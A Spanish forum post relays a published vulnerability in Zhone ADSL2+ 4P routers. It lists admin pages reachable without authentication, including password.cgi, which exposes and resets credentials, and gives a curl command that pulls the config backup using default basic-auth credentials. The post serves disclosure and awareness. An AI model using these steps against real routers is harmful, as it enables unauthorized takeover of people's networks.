Obtención de privilegios roots en Zhone ADSL2+ 4P (Pagina 1) / Otras marcas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 05-09-2015 11:10:11

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,496

Obtención de privilegios roots en Zhone ADSL2+ 4P

Obtención de privilegios de administrador en la gama  Zhone ADSL2+ 4P

  No conocía a la marca Zhone.

zhone2.jpg

Tienen una pequeña serie de CPE : products
Estos routers sufren de una grave enfermedad: además de tener una pinta que espanta hasta sus propias  madres;  son iguales de seguros que un router thomson ( cf Obtener los credenciales de administrador de un Thomson TWG850) big_smile
  Es lo que demuestra hoy Mahmoud Khaled en vunerabiltylab.
  La información fue también puesta en packet storm:

¿Quieres ser root?
  1. Puedes acceder a estas tres paginas mediante http sin conocer los credenciales

    http://[LOCALHOST]:?/pvccfg.cgi
    http://[LOCALHOST]:?/dnscfg.cgi
    http://[LOCALHOST]:?/password.cgi  (In addition to text storage of sensitive information!)
  2. En localhost pones la pasarela y si vas por ejemplo a password.cgi puedes conocer or re-configurar el nombre y la contraseña de administrador. 
    Puedes obtener los parámetros guardados en el fichero backupsettings.conf. gracias una simple petición con curl.

    curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" 

    ( ("dXNlcjp1c2Vy" = "user:user" en base64))

Un tipo de brecha ya vistas en le pasado y que no deberíamos encontrar en una serie moderna de puntos de acceso.

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
8 93 Hoy 10:25:14 por Koala
Pegado:
Pegado:: Hostbase 1.0 released por Koala  [ 1 2 ]
42 740 Hoy 05:33:24 por Koala
7 5796 Ayer 13:05:08 por Betis-Jesus
0 39 Ayer 11:07:59 por kcdtv
9 117 26-03-2017 00:28:19 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: adrii159
Usuarios registrados conectados: 1
Invitados conectados: 7

Conectados: M1ck3y

Estadisticas de los foros

Número total de usuarios registrados: 454
Número total de temas: 731
Número total de mensajes: 5,442

Máx. usuarios conectados: 61 el Hoy 00:04:22